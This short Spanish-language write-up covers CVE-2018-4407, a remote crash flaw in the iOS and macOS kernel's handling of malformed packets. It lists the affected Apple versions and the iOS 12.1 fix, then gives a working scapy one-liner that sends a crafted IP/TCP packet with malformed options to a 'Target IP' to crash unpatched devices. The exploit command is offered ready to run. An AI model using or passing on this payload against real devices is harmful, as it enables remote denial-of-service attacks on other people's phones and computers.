
Descripción general e implementación de CVE-2018-4407
El principio consiste en hacer que otros campos del paquete "icmp" sean inválidos; cuando el kernel de macOS o iPhone los analiza, no se ha implementado la comprobación de tamaño, lo que provoca un crash.
Apple iOS 11 y versiones anteriores: todos los dispositivos
Apple macOS High Sierra (la versión más alta afectada es 10.13.6): todos los dispositivos
Apple macOS Sierra (la versión más alta afectada es 10.12.6): todos los dispositivos
Apple OS X El Capitan y versiones anteriores: todos los dispositivos
Apple corrigió por completo esta vulnerabilidad en el paquete de actualización "iOS 12.1" lanzado el 30 de octubre.
pip install scapy
sudo scapy send(IP(dst="Target IP",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))